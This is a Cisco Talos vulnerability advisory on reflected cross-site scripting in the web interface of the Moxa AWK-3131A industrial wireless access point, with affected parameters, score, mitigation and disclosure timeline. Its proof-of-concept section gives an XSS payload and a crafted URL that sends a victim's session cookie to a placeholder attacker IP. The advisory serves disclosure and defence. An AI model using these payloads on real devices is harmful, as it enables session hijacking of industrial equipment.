Talos Vulnerability Report

TALOS-2016-0233

Moxa AWK-3131A Web Application Multiple Reflected Cross-Site Scripting Vulnerabilities

April 10, 2017
CVE Number

CVE-2016-8719

Summary

An exploitable reflected Cross-Site Scripting vulnerability exists in the Web Application functionality of Moxa AWK-3131A Wireless Access Point running firmware 1.1. Specially crafted input, in multiple parameters, can cause a malicious scripts to be executed by a victim.

Tested Versions

Moxa AWK-3131A Series Industrial IEEE 802.11a/b/g/n wireless AP/bridge/client 1.1

Product URLs

http://www.moxa.com/product/AWK-3131A.htm

CVSSv3 Score

7.5 - CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

Details

An exploitable Reflected Cross-Site Scripting (XSS) vulnerability exists in the Web Application functionality of Moxa AWK-3131A Series Industrial IEEE 802.11a/b/g/n wireless AP/bridge/client. Specially crafted input, in multiple parameters, can cause a malicious scripts to be executed by a victim.

The following parameters have been validated as being vulnerable to XSS exploitation: - devIndex parameter in client_list.asp - devIndex parameter in multiple_ssid_set.asp - index parameter in wireless_cert.asp - vapIndex parameter in wireless_security.asp

In testing, it was possible to inject JavaScript which allowed an attacker to steal legitimate session tokens, allowing the attacker to impersonate an authenticated user.

Exploit Proof-of-Concept

Basic PoC In multiple_ssid_set.asp, devIndex parameter, JavaScript preceded by "; and closed with %2f%2f

";alert(1)%2f%2f

Stealing Session Tokens The URL below will send an authenticated user’s valid session token to the attacker:

http://<device IP>//wireless_cert.asp?index=?index=%22%3E%3Cscript%3Ewindow.location=%22http://<attacker IP>/test?cookie=%22.concat%28document.cookie%29%3C/script%3E

Mitigation

To significantly mitigate risk of exploitation, disable the web application before the device is deployed.

Timeline

2016-11-14 - Vendor Disclosure
2017-04-10 - Public Release

Credit

Discovered by Patrick DeSantis of Cisco Talos.